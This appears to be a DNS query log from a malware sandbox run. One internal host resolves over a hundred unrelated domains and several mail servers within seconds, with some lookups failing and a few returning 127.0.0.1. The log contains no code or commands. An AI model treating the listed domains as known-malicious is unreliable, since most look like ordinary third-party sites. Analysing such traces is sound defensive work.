                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.360142946 CEST8.8.8.8192.168.2.40xa112No error (0)in1.smtp.messagingengine.com103.168.172.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.360142946 CEST8.8.8.8192.168.2.40xa112No error (0)in1.smtp.messagingengine.com103.168.172.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.360142946 CEST8.8.8.8192.168.2.40xa112No error (0)in1.smtp.messagingengine.com103.168.172.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.360142946 CEST8.8.8.8192.168.2.40xa112No error (0)in1.smtp.messagingengine.com103.168.172.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.360142946 CEST8.8.8.8192.168.2.40xa112No error (0)in1.smtp.messagingengine.com103.168.172.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.360142946 CEST8.8.8.8192.168.2.40xa112No error (0)in1.smtp.messagingengine.com103.168.172.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.417042971 CEST8.8.8.8192.168.2.40x948aNo error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.417042971 CEST8.8.8.8192.168.2.40x948aNo error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.427038908 CEST8.8.8.8192.168.2.40x4509No error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.430309057 CEST8.8.8.8192.168.2.40x6888No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.430309057 CEST8.8.8.8192.168.2.40x6888No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.432624102 CEST8.8.8.8192.168.2.40x26d1No error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.432624102 CEST8.8.8.8192.168.2.40x26d1No error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.473583937 CEST8.8.8.8192.168.2.40x70f7No error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.517019033 CEST8.8.8.8192.168.2.40xcdefNo error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.548861980 CEST8.8.8.8192.168.2.40x39c6No error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.548861980 CEST8.8.8.8192.168.2.40x39c6No error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.560384035 CEST8.8.8.8192.168.2.40x64aNo error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.560384035 CEST8.8.8.8192.168.2.40x64aNo error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.566960096 CEST8.8.8.8192.168.2.40x69cfNo error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.581373930 CEST8.8.8.8192.168.2.40x3384No error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.613583088 CEST8.8.8.8192.168.2.40x6dfcNo error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.739593029 CEST8.8.8.8192.168.2.40x321aNo error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.750237942 CEST8.8.8.8192.168.2.40x33f7No error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.750237942 CEST8.8.8.8192.168.2.40x33f7No error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.758162022 CEST8.8.8.8192.168.2.40x9f80Name error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.763641119 CEST8.8.8.8192.168.2.40xf93fNo error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.764928102 CEST8.8.8.8192.168.2.40xf40fNo error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.764928102 CEST8.8.8.8192.168.2.40xf40fNo error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.778181076 CEST8.8.8.8192.168.2.40xcdc5No error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.797986984 CEST8.8.8.8192.168.2.40xe54No error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.814750910 CEST8.8.8.8192.168.2.40x3061No error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.837516069 CEST8.8.8.8192.168.2.40xfb6eNo error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.865341902 CEST8.8.8.8192.168.2.40x6f94No error (0)hbfuels.com85.233.160.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.866873026 CEST8.8.8.8192.168.2.40xeab8No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.866873026 CEST8.8.8.8192.168.2.40xeab8No error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.866873026 CEST8.8.8.8192.168.2.40xeab8No error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.868421078 CEST8.8.8.8192.168.2.40x420eNo error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.871926069 CEST8.8.8.8192.168.2.40xbc8fNo error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.871926069 CEST8.8.8.8192.168.2.40xbc8fNo error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.894737959 CEST8.8.8.8192.168.2.40x191fNo error (0)vivastay.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.894737959 CEST8.8.8.8192.168.2.40x191fNo error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.894737959 CEST8.8.8.8192.168.2.40x191fNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.894737959 CEST8.8.8.8192.168.2.40x191fNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.901112080 CEST8.8.8.8192.168.2.40x7488No error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.903728962 CEST8.8.8.8192.168.2.40x5771No error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.908423901 CEST8.8.8.8192.168.2.40xc34eNo error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.925492048 CEST8.8.8.8192.168.2.40x7ddbNo error (0)shittas.com208.91.197.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.940107107 CEST8.8.8.8192.168.2.40x9069No error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.953514099 CEST8.8.8.8192.168.2.40x5c18No error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.960603952 CEST8.8.8.8192.168.2.40x49f3No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.960603952 CEST8.8.8.8192.168.2.40x49f3No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:40.996170044 CEST8.8.8.8192.168.2.40x2f38No error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.009361029 CEST8.8.8.8192.168.2.40x692eNo error (0)hyab.com172.67.193.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.009361029 CEST8.8.8.8192.168.2.40x692eNo error (0)hyab.com104.21.65.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.023947954 CEST8.8.8.8192.168.2.40x319dNo error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.039156914 CEST8.8.8.8192.168.2.40x9ecaNo error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.056396961 CEST8.8.8.8192.168.2.40x68aNo error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.069114923 CEST8.8.8.8192.168.2.40x99abNo error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.069114923 CEST8.8.8.8192.168.2.40x99abNo error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.076087952 CEST8.8.8.8192.168.2.40x3cbaNo error (0)tabbles.net80.211.41.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.079090118 CEST8.8.8.8192.168.2.40xd561No error (0)sinwal.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.079090118 CEST8.8.8.8192.168.2.40xd561No error (0)sinwal.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.158893108 CEST8.8.8.8192.168.2.40x5831No error (0)lyto.net188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.158893108 CEST8.8.8.8192.168.2.40x5831No error (0)lyto.net188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.205495119 CEST8.8.8.8192.168.2.40xe0ebNo error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.236653090 CEST8.8.8.8192.168.2.40xc36eNo error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.256978989 CEST8.8.8.8192.168.2.40xcef3No error (0)impexnc.com204.11.56.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.282433987 CEST8.8.8.8192.168.2.40xa96dNo error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.282433987 CEST8.8.8.8192.168.2.40xa96dNo error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.313297033 CEST8.8.8.8192.168.2.40x7c5dNo error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.315433979 CEST8.8.8.8192.168.2.40x5fc2No error (0)zugseil.com92.42.191.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.360858917 CEST8.8.8.8192.168.2.40xdba0No error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.408659935 CEST8.8.8.8192.168.2.40x7061No error (0)diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.432292938 CEST8.8.8.8192.168.2.40x59a7Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.436428070 CEST8.8.8.8192.168.2.40x822dNo error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.478585958 CEST8.8.8.8192.168.2.40x8a31Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.490719080 CEST8.8.8.8192.168.2.40xdf35No error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.494107008 CEST8.8.8.8192.168.2.40xeecfNo error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.679725885 CEST8.8.8.8192.168.2.40x7d5bNo error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.716182947 CEST8.8.8.8192.168.2.40x543No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.722652912 CEST8.8.8.8192.168.2.40xf127No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:41.797883987 CEST8.8.8.8192.168.2.40x1151No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:44.116194963 CEST8.8.8.8192.168.2.40x50fcServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:44.168164015 CEST8.8.8.8192.168.2.40xb23bName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:44.169691086 CEST8.8.8.8192.168.2.40x144fServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:44.707806110 CEST8.8.8.8192.168.2.40xf2faNo error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:44.709582090 CEST8.8.8.8192.168.2.40x2424No error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:44.709582090 CEST8.8.8.8192.168.2.40x2424No error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:45.113725901 CEST8.8.8.8192.168.2.40x50fcServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:45.207561970 CEST8.8.8.8192.168.2.40x144fServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:45.243793011 CEST8.8.8.8192.168.2.40x71d2No error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:45.243793011 CEST8.8.8.8192.168.2.40x71d2No error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.014456034 CEST8.8.8.8192.168.2.40x181fNo error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.113673925 CEST8.8.8.8192.168.2.40x50fcServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.175651073 CEST8.8.8.8192.168.2.40xa45dNo error (0)oh28ya.com54.95.64.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.175651073 CEST8.8.8.8192.168.2.40xa45dNo error (0)oh28ya.com54.248.249.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.187016964 CEST8.8.8.8192.168.2.40x8daeNo error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.189289093 CEST8.8.8.8192.168.2.40x2661No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.189289093 CEST8.8.8.8192.168.2.40x2661No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.191427946 CEST8.8.8.8192.168.2.40x6ef1No error (0)shiner.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.191427946 CEST8.8.8.8192.168.2.40x6ef1No error (0)shiner.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.199965954 CEST8.8.8.8192.168.2.40x9fbNo error (0)webways.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.199965954 CEST8.8.8.8192.168.2.40x9fbNo error (0)webways.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.203912020 CEST8.8.8.8192.168.2.40x64b8No error (0)gujarat.com104.21.73.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.203912020 CEST8.8.8.8192.168.2.40x64b8No error (0)gujarat.com172.67.145.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.223140001 CEST8.8.8.8192.168.2.40x144fServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.233355045 CEST8.8.8.8192.168.2.40x86f0No error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.305197954 CEST8.8.8.8192.168.2.40x2edcNo error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.351726055 CEST8.8.8.8192.168.2.40x31c6No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.351726055 CEST8.8.8.8192.168.2.40x31c6No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.353867054 CEST8.8.8.8192.168.2.40x9819No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.355705976 CEST8.8.8.8192.168.2.40xfa67No error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.365369081 CEST8.8.8.8192.168.2.40x9705No error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.368680954 CEST8.8.8.8192.168.2.40x3607No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.447242975 CEST8.8.8.8192.168.2.40xbe51No error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.512813091 CEST8.8.8.8192.168.2.40xa12fNo error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.515367031 CEST8.8.8.8192.168.2.40x1e36No error (0)aiolos-sa.gr188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.515367031 CEST8.8.8.8192.168.2.40x1e36No error (0)aiolos-sa.gr188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.550448895 CEST8.8.8.8192.168.2.40xf82dNo error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.556915045 CEST8.8.8.8192.168.2.40x7b1aNo error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.570333958 CEST8.8.8.8192.168.2.40xb77dNo error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.570458889 CEST8.8.8.8192.168.2.40xc887No error (0)ftchat.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.570458889 CEST8.8.8.8192.168.2.40xc887No error (0)ftchat.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.573164940 CEST8.8.8.8192.168.2.40x661dNo error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.573164940 CEST8.8.8.8192.168.2.40x661dNo error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.592760086 CEST8.8.8.8192.168.2.40xc056No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.592760086 CEST8.8.8.8192.168.2.40xc056No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.592760086 CEST8.8.8.8192.168.2.40xc056No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.592760086 CEST8.8.8.8192.168.2.40xc056No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.658113003 CEST8.8.8.8192.168.2.40x1f05No error (0)vivastay.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.658113003 CEST8.8.8.8192.168.2.40x1f05No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.658113003 CEST8.8.8.8192.168.2.40x1f05No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.658113003 CEST8.8.8.8192.168.2.40x1f05No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.662497997 CEST8.8.8.8192.168.2.40x14ecNo error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.717536926 CEST8.8.8.8192.168.2.40x46bNo error (0)cvswl.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.717536926 CEST8.8.8.8192.168.2.40x46bNo error (0)cvswl.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.758048058 CEST8.8.8.8192.168.2.40x5ee0No error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.858249903 CEST8.8.8.8192.168.2.40x6ef3No error (0)bd-style.com103.112.69.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:46.909909964 CEST8.8.8.8192.168.2.40xb384No error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.002108097 CEST8.8.8.8192.168.2.40xcd8aNo error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.002108097 CEST8.8.8.8192.168.2.40xcd8aNo error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.084588051 CEST8.8.8.8192.168.2.40xa9d9No error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.084588051 CEST8.8.8.8192.168.2.40xa9d9No error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.084588051 CEST8.8.8.8192.168.2.40xa9d9No error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.084588051 CEST8.8.8.8192.168.2.40xa9d9No error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.105875015 CEST8.8.8.8192.168.2.40xab5eNo error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.105875015 CEST8.8.8.8192.168.2.40xab5eNo error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.105875015 CEST8.8.8.8192.168.2.40xab5eNo error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.120877028 CEST8.8.8.8192.168.2.40x5d06No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.191857100 CEST8.8.8.8192.168.2.40x2beeNo error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.206764936 CEST8.8.8.8192.168.2.40xae64No error (0)onzcda.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.206764936 CEST8.8.8.8192.168.2.40xae64No error (0)onzcda.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.218686104 CEST8.8.8.8192.168.2.40xc06No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.218686104 CEST8.8.8.8192.168.2.40xc06No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.241703033 CEST8.8.8.8192.168.2.40x5eeaName error (3)ascc.org.aunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.257879972 CEST8.8.8.8192.168.2.40xd981No error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.358834982 CEST8.8.8.8192.168.2.40x7b12No error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.423787117 CEST8.8.8.8192.168.2.40x5921No error (0)yhsll.com102.134.49.77A (IP address)IN (0x0001)false
